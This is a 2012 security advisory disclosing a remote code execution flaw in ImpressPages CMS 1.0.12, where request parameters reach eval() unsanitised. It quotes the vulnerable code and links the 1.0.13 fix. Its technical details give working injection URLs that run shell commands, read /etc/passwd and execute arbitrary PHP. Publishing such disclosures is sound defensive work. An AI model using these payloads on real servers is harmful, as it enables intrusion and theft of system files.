ImpressPages CMS 1.0.12 Code Execution

`=======  
Summary  
=======  
Name: Remote code execution in ImpressPages CMS   
Release Date: 5 January 2012  
Reference: NGS00109  
Discoverer: David Middlehurst <[email protected]>  
Vendor: ImpressPages  
Vendor Reference:   
Systems Affected: ImpressPages CMS 1.0.12  
Risk: High  
Status: Published  
  
========  
TimeLine  
========  
Discovered: 28 August 2011  
Released: 28 August 2011  
Approved: 28 August 2011  
Reported: 5 September 2011  
Fixed: 21 September 2011  
Published: 5 January 2012  
  
===========  
Description  
===========  
ImpressPages CMS (1.0.12) is prone to a remote command execution attack due to an unsanitised eval() code execution flaw.  
  
=================  
Technical Details  
=================  
http://host/impresspages/?cm_group=text_photos\title\Module();echo%20shell_exec('ls%20-alh');echo&cm_name=test  
http://host/impresspages/?cm_group=text_photos\title\Module();echo%20file_get_contents('/etc/passwd');echo&cm_name=test  
http://host/impresspages/?cm_group=text_photos\title\Module();[[ArbitraryPHP Code Here]];echo&cm_name=test  
  
The affected code:  
  
File: /ip_cms/modules/standard/content_management/actions.php Line 37  
  
if(isset($_REQUEST['cm_group']) && isset($_REQUEST['cm_name'])) {  
eval (' $new_module = new  
\\Modules\\standard\\content_management\\Widgets\\'.$_REQUEST['cm_group'].'\\'.$_REQUEST['cm_name'].'\\Module();  
');  
$new_module->makeActions();  
}  
  
===============  
Fix Information  
===============  
Please update all instances of Impress Pages to the 1.0.13 release:   
http://www.impresspages.org/news/impresspages-1-0-13-security-release/  
  
NGS Secure Research  
http://www.ngssecure.com  
`